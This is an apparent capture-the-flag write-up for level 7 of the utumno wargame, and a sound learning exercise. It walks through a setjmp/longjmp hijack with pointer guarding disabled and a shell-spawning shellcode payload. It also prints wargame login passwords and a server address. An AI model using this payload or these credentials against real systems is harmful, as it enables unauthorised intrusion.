utumno - 7
2016-04-13 15:02
root@today:~/Desktop/misc/utumno/utumno6# ssh utumno7@178.79.134.250
utumno7@178.79.134.250's password: totiquegae
utumno7@melinda:~$ mkdir /tmp/utu7
utumno7@melinda:~$ cd /tmp/utu7
utumno7@melinda:~$ export LD_POINTER_GUARD=0

(LD_POINTER_GUARD (glibc since 2.4): Set to 0 to disable pointer guarding. Any other value enables pointer guarding, which is also the default. Pointer guarding is a security mechanism whereby some pointers to code stored in writable program memory (return addresses saved by setjmp(3) or function pointers used by various glibc internals) are mangled semi-randomly to make it more difficult for an attacker to hijack the pointers for use in the event of a buffer overrun or stack-smashing attack.)
# stack environment
---------
eip (rol eip, 0x09 ; rotate left 9 bits)
---------
esp (rol esp, 0x09 ; rotate left 9 bits)
---------
ebp
---------
edi
---------
esi
---------
ebx
--------- jmp_buf (esp + 0x90), 128B
---------
buffer (esp + 0x10)

# we use gdb to get the buffer address: it's 0xffffd420
# rol 0xffffd420, 0x9 == 0xffa841ff
# we set jmp_buf.esp = 0xffa841ff, jmp_buf.eip = 0xffa841ff
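The pointer-guard mechanism quoted above, as an added C example (not code from the write-up): glibc's i386 PTR_MANGLE xors a saved pointer with a per-process guard and rotates it left 9 bits, and PTR_DEMANGLE undoes that. With LD_POINTER_GUARD=0 the xor term vanishes and the stored jmp_buf word is a fixed rotation of the real pointer, which is why the write-up can precompute 0xffa841ff; the guard values used here are constructed stand-ins for the random per-process value.

```c
#include <stdint.h>
#include <stdio.h>

/* 32-bit rotate left / right by n bits (1 <= n <= 31). */
static uint32_t rol32(uint32_t v, unsigned n) { return (v << n) | (v >> (32 - n)); }
static uint32_t ror32(uint32_t v, unsigned n) { return (v >> n) | (v << (32 - n)); }

/* Model of glibc's i386 PTR_MANGLE (xor with guard, then rol 9) and its
   inverse PTR_DEMANGLE (ror 9, then xor). Model written for this example. */
uint32_t ptr_mangle(uint32_t ptr, uint32_t guard) { return rol32(ptr ^ guard, 9); }
uint32_t ptr_demangle(uint32_t m, uint32_t guard) { return ror32(m, 9) ^ guard; }

/* With the guard forced to zero (LD_POINTER_GUARD=0), the word that longjmp
   will decode back to `target` is just rol(target, 9): a public, fixed mapping. */
uint32_t stored_word_without_guard(uint32_t target) { return ptr_mangle(target, 0); }

/* With a non-zero guard the stored word depends on a secret the process picks
   at start-up: two different guards need two different words for the same target. */
int guard_changes_mangling(uint32_t target, uint32_t g1, uint32_t g2) {
    return ptr_mangle(target, g1) != ptr_mangle(target, g2);
}

int main(void) {
    uint32_t target = 0xffffd420u;              /* buffer address from the write-up */
    uint32_t guard = 0x12345678u;               /* constructed stand-in guard value */
    printf("guard=0: rol(0x%08x, 9) = 0x%08x\n", target, stored_word_without_guard(target));
    printf("guard=0x%08x: stored word = 0x%08x\n", guard, ptr_mangle(target, guard));
    printf("demangle round-trip ok: %d\n", ptr_demangle(ptr_mangle(target, guard), guard) == target);
    return 0;
}
```

glibc 2.23 and later ignore LD_POINTER_GUARD, so on current systems the guard cannot be switched off this way.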
utumno7@melinda:/tmp/utu7$ /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
^Z
[1]+  Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
utumno7@melinda:/tmp/utu7$ jobs -l
[1]+ 27875 Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
utumno7@melinda:/tmp/utu7$ kill -10 27875
utumno7@melinda:/tmp/utu7$ fg
/utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
^Z
[1]+  Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
utumno7@melinda:/tmp/utu7$ kill -12 27875
utumno7@melinda:/tmp/utu7$ fg
/utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
$ whoami
utumno8
$ cat /etc/utumno_pass/utumno8
jaeyeetiav
$
ref[1]: http://hacktracking.blogspot.com/2013/06/utumno-wargame-level-7.html